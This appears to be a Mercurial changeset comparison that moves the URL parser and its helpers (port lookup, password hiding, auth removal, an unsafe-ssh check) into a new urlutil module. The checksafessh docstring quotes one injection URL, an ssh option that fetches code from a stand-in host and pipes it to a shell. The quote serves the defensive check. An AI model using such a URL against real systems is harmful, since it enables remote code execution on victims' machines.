comparison mercurial/utils/urlutil.py @ 46907:ffd3e823a7e5

urlutil: extract `url` related code from `util` into the new module The new module is well fitting for this new code. And this will be useful to make the gathered code collaborate more later. Differential Revision: https://phab.mercurial-scm.org/D10374
author Pierre-Yves David <pierre-yves.david@octobus.net>
date Mon, 12 Apr 2021 03:01:04 +0200
parents 33524c46a092
children 4452cb788404
comparison
equal deleted inserted replaced
46906:33524c46a092 46907:ffd3e823a7e5
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others 3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 # 4 #
5 # This software may be used and distributed according to the terms of the 5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version. 6 # GNU General Public License version 2 or any later version.
7 import os 7 import os
8 import re as remod
9 import socket
8 10
9 from ..i18n import _ 11 from ..i18n import _
10 from ..pycompat import ( 12 from ..pycompat import (
11 getattr, 13 getattr,
12 setattr, 14 setattr,
13 ) 15 )
14 from .. import ( 16 from .. import (
17 encoding,
15 error, 18 error,
16 pycompat, 19 pycompat,
17 util, 20 urllibcompat,
18 ) 21 )
22
23
24 if pycompat.TYPE_CHECKING:
25 from typing import (
26 Union,
27 )
28
29 urlreq = urllibcompat.urlreq
30
31
32 def getport(port):
33 # type: (Union[bytes, int]) -> int
34 """Return the port for a given network service.
35
36 If port is an integer, it's returned as is. If it's a string, it's
37 looked up using socket.getservbyname(). If there's no matching
38 service, error.Abort is raised.
39 """
40 try:
41 return int(port)
42 except ValueError:
43 pass
44
45 try:
46 return socket.getservbyname(pycompat.sysstr(port))
47 except socket.error:
48 raise error.Abort(
49 _(b"no port number associated with service '%s'") % port
50 )
51
52
53 class url(object):
54 r"""Reliable URL parser.
55
56 This parses URLs and provides attributes for the following
57 components:
58
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
60
61 Missing components are set to None. The only exception is
62 fragment, which is set to '' if present but empty.
63
64 If parsefragment is False, fragment is included in query. If
65 parsequery is False, query is included in path. If both are
66 False, both fragment and query are included in path.
67
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
69
70 Note that for backward compatibility reasons, bundle URLs do not
71 take host names. That means 'bundle://../' has a path of '../'.
72
73 Examples:
74
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
79 >>> url(b'file:///home/joe/repo')
80 <url scheme: 'file', path: '/home/joe/repo'>
81 >>> url(b'file:///c:/temp/foo/')
82 <url scheme: 'file', path: 'c:/temp/foo/'>
83 >>> url(b'bundle:foo')
84 <url scheme: 'bundle', path: 'foo'>
85 >>> url(b'bundle://../foo')
86 <url scheme: 'bundle', path: '../foo'>
87 >>> url(br'c:\foo\bar')
88 <url path: 'c:\\foo\\bar'>
89 >>> url(br'\\blah\blah\blah')
90 <url path: '\\\\blah\\blah\\blah'>
91 >>> url(br'\\blah\blah\blah#baz')
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
93 >>> url(br'file:///C:\users\me')
94 <url scheme: 'file', path: 'C:\\users\\me'>
95
96 Authentication credentials:
97
98 >>> url(b'ssh://joe:xyz@x/repo')
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
100 >>> url(b'ssh://joe@x/repo')
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
102
103 Query strings and fragments:
104
105 >>> url(b'http://host/a?b#c')
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
109
110 Empty path:
111
112 >>> url(b'')
113 <url path: ''>
114 >>> url(b'#a')
115 <url path: '', fragment: 'a'>
116 >>> url(b'http://host/')
117 <url scheme: 'http', host: 'host', path: ''>
118 >>> url(b'http://host/#a')
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
120
121 Only scheme:
122
123 >>> url(b'http:')
124 <url scheme: 'http'>
125 """
126
127 _safechars = b"!~*'()+"
128 _safepchars = b"/!~*'()+:\\"
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
130
131 def __init__(self, path, parsequery=True, parsefragment=True):
132 # type: (bytes, bool, bool) -> None
133 # We slowly chomp away at path until we have only the path left
134 self.scheme = self.user = self.passwd = self.host = None
135 self.port = self.path = self.query = self.fragment = None
136 self._localpath = True
137 self._hostport = b''
138 self._origpath = path
139
140 if parsefragment and b'#' in path:
141 path, self.fragment = path.split(b'#', 1)
142
143 # special case for Windows drive letters and UNC paths
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
145 self.path = path
146 return
147
148 # For compatibility reasons, we can't handle bundle paths as
149 # normal URLS
150 if path.startswith(b'bundle:'):
151 self.scheme = b'bundle'
152 path = path[7:]
153 if path.startswith(b'//'):
154 path = path[2:]
155 self.path = path
156 return
157
158 if self._matchscheme(path):
159 parts = path.split(b':', 1)
160 if parts[0]:
161 self.scheme, path = parts
162 self._localpath = False
163
164 if not path:
165 path = None
166 if self._localpath:
167 self.path = b''
168 return
169 else:
170 if self._localpath:
171 self.path = path
172 return
173
174 if parsequery and b'?' in path:
175 path, self.query = path.split(b'?', 1)
176 if not path:
177 path = None
178 if not self.query:
179 self.query = None
180
181 # // is required to specify a host/authority
182 if path and path.startswith(b'//'):
183 parts = path[2:].split(b'/', 1)
184 if len(parts) > 1:
185 self.host, path = parts
186 else:
187 self.host = parts[0]
188 path = None
189 if not self.host:
190 self.host = None
191 # path of file:///d is /d
192 # path of file:///d:/ is d:/, not /d:/
193 if path and not hasdriveletter(path):
194 path = b'/' + path
195
196 if self.host and b'@' in self.host:
197 self.user, self.host = self.host.rsplit(b'@', 1)
198 if b':' in self.user:
199 self.user, self.passwd = self.user.split(b':', 1)
200 if not self.host:
201 self.host = None
202
203 # Don't split on colons in IPv6 addresses without ports
204 if (
205 self.host
206 and b':' in self.host
207 and not (
208 self.host.startswith(b'[') and self.host.endswith(b']')
209 )
210 ):
211 self._hostport = self.host
212 self.host, self.port = self.host.rsplit(b':', 1)
213 if not self.host:
214 self.host = None
215
216 if (
217 self.host
218 and self.scheme == b'file'
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
220 ):
221 raise error.Abort(
222 _(b'file:// URLs can only refer to localhost')
223 )
224
225 self.path = path
226
227 # leave the query string escaped
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
229 v = getattr(self, a)
230 if v is not None:
231 setattr(self, a, urlreq.unquote(v))
232
233 def copy(self):
234 u = url(b'temporary useless value')
235 u.path = self.path
236 u.scheme = self.scheme
237 u.user = self.user
238 u.passwd = self.passwd
239 u.host = self.host
240 u.path = self.path
241 u.query = self.query
242 u.fragment = self.fragment
243 u._localpath = self._localpath
244 u._hostport = self._hostport
245 u._origpath = self._origpath
246 return u
247
248 @encoding.strmethod
249 def __repr__(self):
250 attrs = []
251 for a in (
252 b'scheme',
253 b'user',
254 b'passwd',
255 b'host',
256 b'port',
257 b'path',
258 b'query',
259 b'fragment',
260 ):
261 v = getattr(self, a)
262 if v is not None:
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
264 return b'<url %s>' % b', '.join(attrs)
265
266 def __bytes__(self):
267 r"""Join the URL's components back into a URL string.
268
269 Examples:
270
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
274 'http://user:pw@host:80/?foo=bar&baz=42'
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
276 'http://user:pw@host:80/?foo=bar%3dbaz'
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
278 'ssh://user:pw@[::1]:2200//home/joe#'
279 >>> bytes(url(b'http://localhost:80//'))
280 'http://localhost:80//'
281 >>> bytes(url(b'http://localhost:80/'))
282 'http://localhost:80/'
283 >>> bytes(url(b'http://localhost:80'))
284 'http://localhost:80/'
285 >>> bytes(url(b'bundle:foo'))
286 'bundle:foo'
287 >>> bytes(url(b'bundle://../foo'))
288 'bundle:../foo'
289 >>> bytes(url(b'path'))
290 'path'
291 >>> bytes(url(b'file:///tmp/foo/bar'))
292 'file:///tmp/foo/bar'
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
294 'file:///c:/tmp/foo/bar'
295 >>> print(url(br'bundle:foo\bar'))
296 bundle:foo\bar
297 >>> print(url(br'file:///D:\data\hg'))
298 file:///D:\data\hg
299 """
300 if self._localpath:
301 s = self.path
302 if self.scheme == b'bundle':
303 s = b'bundle:' + s
304 if self.fragment:
305 s += b'#' + self.fragment
306 return s
307
308 s = self.scheme + b':'
309 if self.user or self.passwd or self.host:
310 s += b'//'
311 elif self.scheme and (
312 not self.path
313 or self.path.startswith(b'/')
314 or hasdriveletter(self.path)
315 ):
316 s += b'//'
317 if hasdriveletter(self.path):
318 s += b'/'
319 if self.user:
320 s += urlreq.quote(self.user, safe=self._safechars)
321 if self.passwd:
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
323 if self.user or self.passwd:
324 s += b'@'
325 if self.host:
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
327 s += urlreq.quote(self.host)
328 else:
329 s += self.host
330 if self.port:
331 s += b':' + urlreq.quote(self.port)
332 if self.host:
333 s += b'/'
334 if self.path:
335 # TODO: similar to the query string, we should not unescape the
336 # path when we store it, the path might contain '%2f' = '/',
337 # which we should *not* escape.
338 s += urlreq.quote(self.path, safe=self._safepchars)
339 if self.query:
340 # we store the query in escaped form.
341 s += b'?' + self.query
342 if self.fragment is not None:
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
344 return s
345
346 __str__ = encoding.strmethod(__bytes__)
347
348 def authinfo(self):
349 user, passwd = self.user, self.passwd
350 try:
351 self.user, self.passwd = None, None
352 s = bytes(self)
353 finally:
354 self.user, self.passwd = user, passwd
355 if not self.user:
356 return (s, None)
357 # authinfo[1] is passed to urllib2 password manager, and its
358 # URIs must not contain credentials. The host is passed in the
359 # URIs list because Python < 2.4.3 uses only that to search for
360 # a password.
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
362
363 def isabs(self):
364 if self.scheme and self.scheme != b'file':
365 return True # remote URL
366 if hasdriveletter(self.path):
367 return True # absolute for our purposes - can't be joined()
368 if self.path.startswith(br'\\'):
369 return True # Windows UNC path
370 if self.path.startswith(b'/'):
371 return True # POSIX-style
372 return False
373
374 def localpath(self):
375 # type: () -> bytes
376 if self.scheme == b'file' or self.scheme == b'bundle':
377 path = self.path or b'/'
378 # For Windows, we need to promote hosts containing drive
379 # letters to paths with drive letters.
380 if hasdriveletter(self._hostport):
381 path = self._hostport + b'/' + self.path
382 elif (
383 self.host is not None and self.path and not hasdriveletter(path)
384 ):
385 path = b'/' + path
386 return path
387 return self._origpath
388
389 def islocal(self):
390 '''whether localpath will return something that posixfile can open'''
391 return (
392 not self.scheme
393 or self.scheme == b'file'
394 or self.scheme == b'bundle'
395 )
396
397
398 def hasscheme(path):
399 # type: (bytes) -> bool
400 return bool(url(path).scheme) # cast to help pytype
401
402
403 def hasdriveletter(path):
404 # type: (bytes) -> bool
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
406
407
408 def urllocalpath(path):
409 # type: (bytes) -> bytes
410 return url(path, parsequery=False, parsefragment=False).localpath()
411
412
413 def checksafessh(path):
414 # type: (bytes) -> None
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
416
417 This is a sanity check for ssh urls. ssh will parse the first item as
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
419 Let's prevent these potentially exploited urls entirely and warn the
420 user.
421
422 Raises an error.Abort when the url is unsafe.
423 """
424 path = urlreq.unquote(path)
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
426 raise error.Abort(
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
428 )
429
430
431 def hidepassword(u):
432 # type: (bytes) -> bytes
433 '''hide user credential in a url string'''
434 u = url(u)
435 if u.passwd:
436 u.passwd = b'***'
437 return bytes(u)
438
439
440 def removeauth(u):
441 # type: (bytes) -> bytes
442 '''remove all authentication information from a url string'''
443 u = url(u)
444 u.user = u.passwd = None
445 return bytes(u)
19 446
20 447
21 class paths(dict): 448 class paths(dict):
22 """Represents a collection of paths and their configs. 449 """Represents a collection of paths and their configs.
23 450
101 return register 528 return register
102 529
103 530
104 @pathsuboption(b'pushurl', b'pushloc') 531 @pathsuboption(b'pushurl', b'pushloc')
105 def pushurlpathoption(ui, path, value): 532 def pushurlpathoption(ui, path, value):
106 u = util.url(value) 533 u = url(value)
107 # Actually require a URL. 534 # Actually require a URL.
108 if not u.scheme: 535 if not u.scheme:
109 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) 536 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
110 return None 537 return None
111 538
146 """ 573 """
147 if not rawloc: 574 if not rawloc:
148 raise ValueError(b'rawloc must be defined') 575 raise ValueError(b'rawloc must be defined')
149 576
150 # Locations may define branches via syntax <base>#<branch>. 577 # Locations may define branches via syntax <base>#<branch>.
151 u = util.url(rawloc) 578 u = url(rawloc)
152 branch = None 579 branch = None
153 if u.fragment: 580 if u.fragment:
154 branch = u.fragment 581 branch = u.fragment
155 u.fragment = None 582 u.fragment = None
156 583